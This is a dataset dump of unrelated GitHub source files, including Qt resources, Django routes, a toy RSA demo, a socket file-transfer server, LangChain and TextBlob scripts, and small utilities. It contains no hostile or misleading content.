b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x14\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x03\\\n\\x00\\x00\\x00\\x2a\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x04\\\n\\x00\\x00\\x00\\x34\\x00\\x02\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x06\\\n\\x00\\x00\\x00\\x46\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x01\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xb9\\x2b\\\n\\x00\\x00\\x00\\x7a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x42\\x18\\\n\\x00\\x00\\x01\\x42\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xc6\\x8e\\\n\\x00\\x00\\x00\\xca\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x82\\x42\\\n\\x00\\x00\\x01\\x8a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xf9\\x8c\\\n\\x00\\x00\\x00\\x9c\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x67\\xd1\\\n\\x00\\x00\\x01\\x64\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xea\\x17\\\n\\x00\\x00\\x01\\xb0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x14\\xcc\\\n\\x00\\x00\\x01\\xde\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x22\\x90\\\n\\x00\\x00\\x00\\x5c\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x28\\x1a\\\n\\x00\\x00\\x00\\xec\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xab\\x44\\\n\"\n\nqt_resource_struct_v2 = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x14\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x03\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x2a\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x04\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x34\\x00\\x02\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x06\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x46\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x01\\x6c\\xba\\x2d\\x97\\xa5\\\n\\x00\\x00\\x01\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xb9\\x2b\\\n\\x00\\x00\\x01\\x6c\\xba\\x2d\\x97\\xab\\\n\\x00\\x00\\x00\\x7a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x42\\x18\\\n\\x00\\x00\\x01\\x6c\\xbd\\x7d\\x68\\x31\\\n\\x00\\x00\\x01\\x42\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xc6\\x8e\\\n\\x00\\x00\\x01\\x6c\\xbd\\x7d\\x68\\x31\\\n\\x00\\x00\\x00\\xca\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x82\\x42\\\n\\x00\\x00\\x01\\x6c\\xbd\\x7d\\x68\\x31\\\n\\x00\\x00\\x01\\x8a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xf9\\x8c\\\n\\x00\\x00\\x01\\x6d\\x1b\\x7b\\x34\\x13\\\n\\x00\\x00\\x00\\x9c\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x67\\xd1\\\n\\x00\\x00\\x01\\x6c\\xba\\x2d\\x97\\xa5\\\n\\x00\\x00\\x01\\x64\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xea\\x17\\\n\\x00\\x00\\x01\\x6c\\xba\\x2d\\x97\\xa8\\\n\\x00\\x00\\x01\\xb0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x14\\xcc\\\n\\x00\\x00\\x01\\x6c\\xba\\x2d\\x97\\xa8\\\n\\x00\\x00\\x01\\xde\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x22\\x90\\\n\\x00\\x00\\x01\\x6c\\xba\\x2d\\x97\\xaa\\\n\\x00\\x00\\x00\\x5c\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x28\\x1a\\\n\\x00\\x00\\x01\\x6c\\xbd\\x7d\\x68\\x31\\\n\\x00\\x00\\x00\\xec\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xab\\x44\\\n\\x00\\x00\\x01\\x6c\\xba\\x2d\\x97\\xaa\\\n\"\n\nqt_version = [int(v) for v in QtCore.qVersion().split('.')]\nif qt_version < [5, 8, 0]:\n rcc_version = 1\n qt_resource_struct = qt_resource_struct_v1\nelse:\n rcc_version = 2\n qt_resource_struct = qt_resource_struct_v2\n\ndef 
qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n","repo_name":"Planheat/Planheat-Tool","sub_path":"ui/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":347939,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"7216819464","text":"# pylint: disable=C0103\n\"\"\"URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom django.urls import include\n\nfrom lattedb.project.formfac.views import DiskConcatenatedFormFactor4DStatusView\nfrom lattedb.project.formfac.views import TapeConcatenatedFormFactor4DStatusView\nfrom lattedb.project.formfac.views import DiskTSlicedSAveragedFormFactor4DStatusView\nfrom lattedb.project.formfac.views import TapeTSlicedSAveragedFormFactor4DStatusView\nfrom lattedb.project.formfac.views import DiskTSlicedFormFactor4DStatusView\nfrom lattedb.project.formfac.views import DiskFormFactor4DStatusView\n\nfrom lattedb.project.formfac.views import DiskCorrelatorH5DsetStatusView\nfrom lattedb.project.formfac.views import TapeCorrelatorH5DsetStatusView\n\nfrom lattedb.project.formfac.views import DiskTSlicedSAveragedSpectrum4DStatusView\nfrom lattedb.project.formfac.views import TapeTSlicedSAveragedSpectrum4DStatusView\nfrom lattedb.project.formfac.views import DiskTSlicedSpectrum4DStatusView\nfrom lattedb.project.formfac.views import DiskSpectrum4DStatusView\n\nfrom lattedb.project.formfac.rest.serializers import ROUTER\n\napp_name = \"Project formfac\"\nurlpatterns = [\n path(r\"api/\", include(ROUTER.urls)),\n path(\n \"disk-concat-status\",\n DiskConcatenatedFormFactor4DStatusView.as_view(),\n name=\"Concatenated Form Factor Disk Status\",\n ),\n path(\n \"tape-concat-status\",\n TapeConcatenatedFormFactor4DStatusView.as_view(),\n name=\"Concatenated Form Factor Tape Status\",\n ),\n path(\n \"disk-sliced-averaged-status\",\n DiskTSlicedSAveragedFormFactor4DStatusView.as_view(),\n name=\"Sliced Averaged Form Factor Disk Status\",\n ),\n path(\n \"tape-sliced-averaged-status\",\n TapeTSlicedSAveragedFormFactor4DStatusView.as_view(),\n name=\"Sliced Averaged Form Factor Tape Status\",\n ),\n path(\n \"disk-sliced-status\",\n DiskTSlicedFormFactor4DStatusView.as_view(),\n name=\"Sliced Form Factor Disk Status\",\n ),\n path(\n \"disk-status\",\n DiskFormFactor4DStatusView.as_view(),\n name=\"Form Factor Disk Status\",\n ),\n path(\n \"disk-corr-status\",\n DiskCorrelatorH5DsetStatusView.as_view(),\n name=\"Correlator Disk Status\",\n ),\n path(\n \"tape-corr-status\",\n TapeCorrelatorH5DsetStatusView.as_view(),\n name=\"Correlator Tape Status\",\n ),\n path(\n \"disk-spec-sliced-averaged-status\",\n DiskTSlicedSAveragedSpectrum4DStatusView.as_view(),\n name=\"Sliced Averaged Spectrum Disk 
Status\",\n ),\n path(\n \"tape-spec-sliced-averaged-status\",\n TapeTSlicedSAveragedSpectrum4DStatusView.as_view(),\n name=\"Sliced Averaged Spectrum Tape Status\",\n ),\n path(\n \"disk-spec-sliced-status\",\n DiskTSlicedSpectrum4DStatusView.as_view(),\n name=\"Sliced Spectrum Disk Status\",\n ),\n path(\n \"disk-spec-status\",\n DiskSpectrum4DStatusView.as_view(),\n name=\"Spectrum Disk Status\",\n ),\n]\n","repo_name":"callat-qcd/lattedb","sub_path":"lattedb/project/formfac/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16017237747","text":"import random\nfrom collections import namedtuple\n\n\ndef get_primes(start, stop):\n if start >= stop:\n return []\n\n primes = [2]\n\n for n in range(3, stop + 1, 2):\n for p in primes:\n if n % p == 0:\n break\n else:\n primes.append(n)\n\n while primes and primes[0] < start:\n del primes[0]\n\n return primes\n\n\ndef are_relatively_prime(a, b):\n for n in range(2, min(a, b) + 1):\n if a % n == b % n == 0:\n return False\n return True\n\n\ndef make_key_pair(length):\n \"\"\"Create a public-private key pair.\n\n The key pair is generated from two random prime numbers. The argument\n ``length`` specifies the bit length of the number ``n`` shared between\n the two keys: the higher, the better.\n \"\"\"\n if length < 4:\n raise ValueError('cannot generate a key of length less '\n 'than 4 (got {!r})'.format(length))\n\n # First step: find a number ``n`` which is the product of two prime\n # numbers (``p`` and ``q``). ``n`` must have the number of bits specified\n # by ``length``, therefore it must be in ``range(n_min, n_max + 1)``.\n n_min = 1 << (length - 1)\n n_max = (1 << length) - 1\n\n # The key is stronger if ``p`` and ``q`` have similar bit length. 
We\n # choose two prime numbers in ``range(start, stop)`` so that the\n # difference of bit lengths is at most 2.\n start = 1 << (length // 2 - 1)\n stop = 1 << (length // 2 + 1)\n primes = get_primes(start, stop)\n\n # Now that we have a list of prime number candidates, randomly select\n # two so that their product is in ``range(n_min, n_max + 1)``.\n while primes:\n p = random.choice(primes)\n primes.remove(p)\n q_candidates = [q for q in primes\n if n_min <= p * q <= n_max]\n if q_candidates:\n q = random.choice(q_candidates)\n break\n else:\n raise AssertionError(\"cannot find 'p' and 'q' for a key of \"\n \"length={!r}\".format(length))\n\n # Second step: choose a number ``e`` lower than ``(p - 1) * (q - 1)``\n # which shares no factors with ``(p - 1) * (q - 1)``.\n stop = (p - 1) * (q - 1)\n for e in range(3, stop, 2):\n if are_relatively_prime(e, stop):\n break\n else:\n raise AssertionError(\"cannot find 'e' with p={!r} \"\n \"and q={!r}\".format(p, q))\n\n # Third step: find ``d`` such that ``(d * e - 1)`` is divisible by\n # ``(p - 1) * (q - 1)``.\n for d in range(3, stop, 2):\n if d * e % stop == 1:\n break\n else:\n raise AssertionError(\"cannot find 'd' with p={!r}, q={!r} \"\n \"and e={!r}\".format(p, q, e))\n return PublicKey(p * q, e), PrivateKey(p * q, d)\n\n\nclass PublicKey(namedtuple('PublicKey', 'n e')):\n __slots__ = ()\n\n def encrypt(self, x):\n return pow(x, self.e, self.n)\n\n\nclass PrivateKey(namedtuple('PrivateKey', 'n d')):\n __slots__ = ()\n\n def decrypt(self, x):\n return pow(x, self.d, self.n)\n\n\nif __name__ == '__main__':\n public_key, private_key = make_key_pair(12)\n print(public_key)\n print(private_key)\n\n encrypted_message = public_key.encrypt(123)\n print(encrypted_message)\n decrypted_message = private_key.decrypt(encrypted_message)\n print(decrypted_message)\n","repo_name":"fresko678/security","sub_path":"RSA.py","file_name":"RSA.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34509976352","text":"import sys\n\nsys.path.append('..')\n\n# import Can.comms\nfrom Can.new_Packet import Packet, PacketType, Command\n\nimport socket\nfrom random import randint\nimport time\nfrom ast import literal_eval as l_eval\nimport threading\n\nUDP_IP = '127.0.0.1'\nUDP_PORT = 2137\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nwith open('cal_data') as f:\n hardiron_calibration = l_eval(f.readline())\n\ndef wait_for_udp():\n sock.bind((\"127.0.0.1\", 2138))\n bufferSize = 1024\n\n while True:\n bytesAddressPair = sock.recvfrom(bufferSize)\n message = bytesAddressPair[0]\n address = bytesAddressPair[1]\n clientMsg = \"Message from Client:{}\".format(message)\n clientIP = \"Client IP Address:{}\".format(address)\n print(clientMsg)\n print(clientIP)\n\n\nthreading.Thread(target=wait_for_udp).start()\n\nwhile True:\n\n bp = Packet.create_base_packet(time.time(),randint(-10, 40),randint(800, 1100),randint(0,100), randint(1, 2000))\n ep = Packet.create_extended_packet(time.time(),randint(50, 55), randint(20,23), 0.6,0.5,0.2,0.1,0.3,0.4)\n studio_frame = f\"${bp.encode()[2:]};{';'.join(ep.encode().split(';')[2:-3])};{0}*\\n\"\n sock.sendto(bytes(studio_frame, 'utf-8'),(UDP_IP, UDP_PORT))\n time.sleep(0.5)\n\n","repo_name":"Terence-23/Cansat_Dr0p","sub_path":"legacy/Python/UDP_sender.py","file_name":"UDP_sender.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} 
+{"seq_id":"12828245548","text":"from flask import Flask, request, jsonify\n\nfrom tracer import get_flask_middleware\nfrom opencensus.trace.execution_context import get_opencensus_tracer\napp = Flask(__name__)\nget_flask_middleware(app)\n\n\ndef _get_vendors_with_target(target_food, food_supplier_span, lookup_method='static'):\n food_supplier_span.add_annotation(\"Using {} lookup method\".format(lookup_method))\n if lookup_method == 'static':\n VENDOR_DATA = {\n 'http://127.0.0.1:5002': ['egg', 'bean', 'cheese'],\n 'http://127.0.0.1:5003': ['egg', 'potato'],\n 'http://127.0.0.1:5004': ['bread'],\n }\n return [vendor_url for vendor_url, vendor_items in VENDOR_DATA.items() if target_food in vendor_items]\n\n\n@app.route('/get_food_vendors', methods=['GET'])\ndef get_food_vendors():\n tracer = get_opencensus_tracer()\n with tracer.span(name=\"food_supplier\") as food_supplier_span:\n target_food = request.args['target_food']\n return jsonify(_get_vendors_with_target(target_food, food_supplier_span))\n\n\nif __name__ == '__main__':\n app.run(port=5001)\n","repo_name":"AndrewAXue/opentelemetry-starter","sub_path":"FoodSupplier.py","file_name":"FoodSupplier.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75363029608","text":"from langchain.schema import (\n AIMessage,\n HumanMessage,\n SystemMessage\n)\nfrom langchain.agents import load_tools\nfrom langchain.agents import initialize_agent\nfrom langchain.agents import AgentType\nfrom langchain.llms import OpenAI\nfrom langchain.chat_models import ChatOpenAI\nimport json\nimport time\n\n# temperature controls the randomness of the result 0 means almost determinist 1 means highly random\ndef init_llm():\n llm = OpenAI(temperature=0.1)\n return llm\n\ndef init_chat_model():\n chat_model = ChatOpenAI(temperature=0.1)\n return chat_model\n\ndef read_json_list():\n with open(\"/home/byteide/workspace/Moments/future.json\", \"r\") as file:\n files = json.load(file)\n return files\n\ndef write_json_list(list):\n with open(\"/home/byteide/workspace/Moments/future_zh.json\", \"w\") as file:\n json.dump(list, file)\n\ndef get_batch_translates(lists, chat_model):\n batch = [\n ]\n for li in lists:\n batch.append(\"translate '%s' into chinese\" % li[\"desc\"])\n # batch.append(HumanMessage(content=\"translate '%s' into chinese delightfully\" % token_str))\n \n result = chat_model.generate(batch)\n new_results = []\n for msg in result.generations:\n new_results.append(msg[0].text.replace(\"\\n\", \"\"))\n print(len(new_results))\n \n return new_results\n\ndef test():\n chat_model = init_llm()\n lists = read_json_list()\n batch = 100\n i = 0\n while i < len(lists):\n if i+batch >= len(lists):\n descs = get_batch_translates(lists[i:], chat_model)\n for j in range(len(lists)-i-1):\n lists[j+i][\"desc\"] = descs[j]\n else:\n print(\"here\")\n descs = get_batch_translates(lists[i:i+batch], chat_model)\n for j in range(batch):\n lists[j+i][\"desc\"] = descs[j]\n time.sleep(5)\n print(lists[i:i+5])\n i += batch\n write_json_list(lists)\n return\n \ndef to_utf8():\n with open(\"/home/byteide/workspace/Moments/future_zh.json\", \"r\") as file:\n files = json.load(file)\n with open(\"/home/byteide/workspace/Moments/future_zh.json\", \"w\") as file:\n json.dump(files, file, ensure_ascii=False)\n\n\n 
\n\nto_utf8()","repo_name":"xiechuxi/Moments","sub_path":"moments/nlp/qa.py","file_name":"qa.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36881776211","text":"from datetime import datetime, time, timedelta\r\n\r\ndef horallegada():\r\n\r\n print(\"Digite su hora de llegada\")\r\n horaE = int(input(\"Hora , Digite un numero entre el 1 y el 24 =♥ \"))\r\n while horaE < 1 or horaE > 24:\r\n print(\"HORA NO VALIDA\")\r\n horaE = int(input(\"Hora , Digite un numero entre el 1 y el 24 =♦ \"))\r\n else:\r\n print(\"Hora Ingresada\")\r\n\r\n minutoE = int(input(\"Minutos, Digite un numero entre el 1 y 60 =♥ \"))\r\n while minutoE < 0 or minutoE > 60:\r\n print(\"MINUTO NO VALIDO\")\r\n minutoE = int(input(\"Minuto, Digite un numero entre el 1 y 60 =♦\"))\r\n else:\r\n print(\"Minuto Ingresado\")\r\n\r\n hora_de_entrada = datetime.combine(datetime.today(), time(horaE, minutoE))\r\n\r\n return (hora_de_entrada)\r\n\r\n\r\ndef horasalida():\r\n print(\"Digite su hora de salida\")\r\n horaS = int(input(\"Hora, Digite un numero entre el 1 y el 24: \"))\r\n\r\n while horaS < 1 or horaS > 24:\r\n print(\"HORA NO VALIDA\")\r\n horaS = int(input(\"Hora, Digite un numero entre el 1 y el 24: \"))\r\n else:\r\n print(\"Hora de salida ingresada\")\r\n\r\n minutoS = int(input(\"Minutos, Digite un numero entre el 1 y el 60: \"))\r\n while minutoS < 0 or minutoS > 60:\r\n print(\"MINUTO NO VALIDO\")\r\n minutoS = int(input(\"Minutos, Digite un numero entre el 1 y 60: \"))\r\n else:\r\n print(\"Minuto de salida ingresado\")\r\n\r\n hora_de_salida = datetime.combine(datetime.today(), time(horaS, minutoS))\r\n\r\n return hora_de_salida\r\n\r\nhora_llegada = horallegada()\r\nprint(\"Hora de llegada:\", hora_llegada)\r\n\r\nhora_salida = horasalida()\r\nprint(\"Hora de salida:\", hora_salida)\r\n\r\nhorasTrabajadas = hora_salida - hora_llegada - timedelta(hours=1)\r\nprint(horasTrabajadas)","repo_name":"Tavarod/inicio","sub_path":"horaEntradaSalida.py","file_name":"horaEntradaSalida.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27043620483","text":"\ndef getEquidistantLetters(string):\n # char_indexed_array\n cia = [0 for i in range(27)]\n\n for s in string:\n cia[ord(s)-97] += 1\n \n # resutl_string\n rs = \"\"\n for i,v in enumerate(cia):\n rs += chr(i+97)*v \n return rs \n\nif __name__ == '__main__':\n t = int(input())\n while(t>0):\n s = input()\n print(getEquidistantLetters(s))\n t -= 1\n","repo_name":"mash-97/MineField","sub_path":"codeforces/1626/problem/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18076352093","text":"import numpy as np\n\n\ndef normalize(v, min_v, max_v):\n return (v - min_v) / (max_v - min_v)\n\n\ndef as_batches(x, y, batch_size, shuffle=True):\n x_size = len(x)\n assert x_size == len(y)\n\n indices = np.random.permutation(x_size) if shuffle else None\n\n for offset in range(0, x_size - batch_size + 1, batch_size):\n excerpt = indices[offset:offset + batch_size] if shuffle else slice(offset, offset + batch_size)\n yield x[excerpt], 
y[excerpt]\n","repo_name":"evilsocket/pwnagotchi","sub_path":"pwnagotchi/ai/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":6448,"dataset":"github-code","pt":"53"} +{"seq_id":"5999680478","text":"import signal\nimport logging\nimport threading\nimport argparse\nfrom tandem.rendezvous.executables.rendezvous import TandemRendezvous\n\nshould_shutdown = threading.Event()\n\n\ndef signal_handler(signal, frame):\n    global should_shutdown\n    should_shutdown.set()\n\n\ndef set_up_logging(log_location):\n    logging.basicConfig(\n        level=logging.DEBUG,\n        format=\"%(asctime)s %(levelname)-8s %(message)s\",\n        datefmt=\"%Y-%m-%d %H:%M\",\n        filename=log_location,\n        filemode=\"w\",\n    )\n\n\ndef main():\n    signal.signal(signal.SIGINT, signal_handler)\n    signal.signal(signal.SIGTERM, signal_handler)\n\n    parser = argparse.ArgumentParser(\n        description=\"Starts the Tandem rendezvous server.\"\n    )\n    parser.add_argument(\n        \"--host\",\n        default=\"\",\n        help=\"The host address to bind to.\",\n    )\n    parser.add_argument(\n        \"--port\",\n        default=60000,\n        type=int,\n        help=\"The port to listen on.\",\n    )\n    parser.add_argument(\n        \"--log-file\",\n        default=\"/tmp/tandem-rendezvous.log\",\n        help=\"The location of the log file.\",\n    )\n    args = parser.parse_args()\n\n    set_up_logging(args.log_file)\n\n    # Run the rendezvous server until asked to terminate\n    with TandemRendezvous(args.host, args.port):\n        should_shutdown.wait()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"typeintandem/tandem","sub_path":"rendezvous/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":697,"dataset":"github-code","pt":"53"} +{"seq_id":"72510161128","text":"import json\nimport os\nimport socket\nimport struct\n\n\nshare_dir = r'd:\\shared'  # shared file directory\n\n\ndef get(cmds, conn):\n    filename = cmds[1]\n    # 3. open the file in read mode and send its contents\n    # 1. build the header\n    header_dic = {\n        'filename': filename,\n        'md5': 'xxdxx',\n        # E:\\study\\第3模块,面向对象\\网络编程\\文件传输\\server\\share\\jiaoyue.mp4\n        'file_size': os.path.getsize(r'%s/%s' % (share_dir, filename))\n    }\n    header_json = json.dumps(header_dic)\n    header_bytes = header_json.encode('utf-8')\n\n    # 2. send the header length\n    conn.send(struct.pack('i', len(header_bytes)))  # fixed length of 4 bytes\n\n    # 3. send the header\n    conn.send(header_bytes)\n    # 4. send the actual data\n    with open('%s/%s' % (share_dir, filename), 'rb') as f:\n        # conn.send(f.read())\n        for a in f:\n            conn.send(a)\n\n\ndef put(pc):\n    # 2. receive the file content, open a new file for writing, and write it out\n    # 1. receive the header length\n    obj = pc.recv(4)\n    header_size = struct.unpack('i', obj)[0]\n\n    # 2. receive the header\n    header_bytes = pc.recv(header_size)\n\n    # 3. parse the header, which describes the data\n    header_json = header_bytes.decode('utf-8')\n    header_dic = json.loads(header_json)\n    print(header_dic)\n    total_size = header_dic['file_size']\n    file_name = header_dic['filename']\n\n    # 4. receive the actual data\n    with open('%s/%s' % (share_dir, file_name), 'wb') as f:\n        recv_size = 0\n        while recv_size < total_size:\n            res = pc.recv(1024)\n            f.write(res)\n            recv_size += len(res)\n            print('total size: %s downloaded so far: %s' % (total_size, recv_size))\n\n\ndef run():\n    phone = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    phone.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # allow reusing port 10000\n    phone.bind(('127.0.0.1', 10000))  # ports 0-65535; 0-1024 are reserved for the OS\n    phone.listen(5)\n    while True:  # connection loop\n        conn, client_addr = phone.accept()\n        print(client_addr)\n        while True:  # communication loop\n            try:\n                # 1. receive the command\n                res = conn.recv(1024)  # get jiaoyue.mp4\n                # 2. parse the command and extract its arguments\n                cmds = res.decode('utf-8').split()  # ['get', 
'jiaoyue.mp4']\n                if cmds[0] == 'get':\n                    get(cmds, conn)\n                elif cmds[0] == 'put':\n                    put(conn)\n                elif cmds[0] == 'stop':\n                    print('connection closed successfully')\n                    break\n            except ConnectionResetError:\n                break\n        conn.close()\n    phone.close()\n\n\nif __name__ == '__main__':\n    run()\n","repo_name":"xuanyuanchl/AutomationFrameworks","sub_path":"SocketTest/src/socketTest/socketServer.py","file_name":"socketServer.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41011208762","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 14 16:25:26 2019\n\n@author: bhaku\n\"\"\"\n\nimport os, zipfile,glob\nfrom collections import Counter\nimport sys\nfrom os.path import join, abspath, realpath, dirname\n\nimport os\nfrom textblob import TextBlob \nimport pandas as pd \n\ndir_name = os.path.dirname(os.path.abspath('__file__'))\nprint (dir_name)\n\nextension = \".zip\"\n\nzip_files = glob.glob('*.zip')\n\nfor zip_filename in zip_files:\n    dir_name = os.path.splitext(zip_filename)[0]\n    os.mkdir(dir_name)\n    zip_handler = zipfile.ZipFile(zip_filename, \"a\")\n    zip_handler.extractall(dir_name)\n    #delete zip files after extraction\n'''for item in os.listdir(dir_name): # loop through items in dir\n    if item.endswith(extension): # check for \".zip\" extension\n        file_name = os.path.abspath(item) # get full path of files\n        os.remove(file_name) # delete zipped file'''\n\n\nfor item in os.listdir('.'):  # delete the zip archives once they are extracted\n    if item.endswith(\".zip\"):\n        os.remove(item)\n\nt_path=[] \nfor path, subdirs, files in os.walk(dir_name):\n    \n    for name in files:\n        #text_path=[]\n        t_path.append(os.path.join(path, name)) \n        print(name)\n\nterm = \"__MACOSX\" # AS MAC OS GIVES ADDITIONAL FILES WHILE ZIPPING WHICH ARE NOT ENCODED PROPERLY. WE WILL REMOVE IT\nindex=[]\nfor i,x in enumerate(t_path):\n    words = x.split('\\\\\\\\') #split the path into its components\n\n    if term in words: #see if one of the components is the __MACOSX folder\n        t_path.pop(i)\n        \n\nwith open(\"result.txt\") as f:\n    content = f.readlines()\n# you may also want to remove whitespace characters like `\\n` at the end of each line\ncontent = [x.strip() for x in content]\nshe='She\\\'s'\nhe='He\\\'s'\nfor i in content:\n    if i.find('She') != -1: \n        file= open(\"FemaleOutput.txt\", 'a')\n        file.write(f\"{i}\\n\")\n\n    elif i.find('He') != -1:\n        file= open(\"MaleOutput.txt\", 'a')\n        file.write((f\"{i}\\n\"))\n\n# Sentiment analysis\n#for male heroes\nfrom textblob import TextBlob \nimport pandas as pd \nfh = open('MaleOutput.txt')\n\ndef maledf(textfile):\n    #fh = open(textfile)\n    df_male=pd.DataFrame()\n    \n    df_male = pd.read_csv(textfile, sep=\"\\n\", header=None)\n    df_male.columns=[\"Text\"]\n    df_male[\"textblob\"]=df_male[\"Text\"].apply(lambda x:TextBlob(x)) \n    df_male[\"polarity\"]=df_male[\"textblob\"].apply(lambda x :x.sentiment[0])\n    df_male[\"subjectivity\"]=df_male[\"textblob\"].apply(lambda x :x.sentiment[1])\n    return df_male\ndf_male=maledf('MaleOutput.txt')\ndef femaledf(textfile):\n    #fh = open(textfile)\n    df_female=pd.DataFrame()\n    \n    df_female = pd.read_csv(textfile, sep=\"\\n\", header=None)\n    
df_female.columns=[\"Text\"]\n    df_female[\"textblob\"]=df_female[\"Text\"].apply(lambda x:TextBlob(x)) \n    df_female[\"polarity\"]=df_female[\"textblob\"].apply(lambda x :x.sentiment[0])\n    df_female[\"subjectivity\"]=df_female[\"textblob\"].apply(lambda x :x.sentiment[1])\n    return df_female\n\ndf_female=femaledf('FemaleOutput.txt')\ndf_male=df_male.sort_values(by='polarity', ascending=False)\ndf_female=df_female.sort_values(by='polarity', ascending=False)\n\nTop10_positive_male=df_male.head(10)\n\ndf_male=df_male.sort_values(by='polarity')\nTop10_negative_male=df_male.head(10)\n\nTop10_positive_female=df_female.head(10)\n\ndf_female=df_female.sort_values(by='polarity')\nTop10_negative_female=df_female.head(10)\n\n# Python program to find the k most frequent words \n \ndef Counter1(filename):\n    with open(filename, 'r') as file:\n        datastring = file.read().replace('\\n', '')\n    \n    blob=TextBlob(datastring)\n    qaz=blob.noun_phrases\n    \n    decriptors_series=[]\n    for i in range(0,len(qaz)): \n        decriptors_series.append(qaz[i]) \n    counts = Counter(decriptors_series)  # use a new name so the imported Counter class is not shadowed\n    most_occur = counts.most_common(10) \n    return most_occur \n\na=Counter1('result.txt')\nprint(a)\n\n","repo_name":"sbhakuni/FE-595","sub_path":"FE595TextAnalysis.py","file_name":"FE595TextAnalysis.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 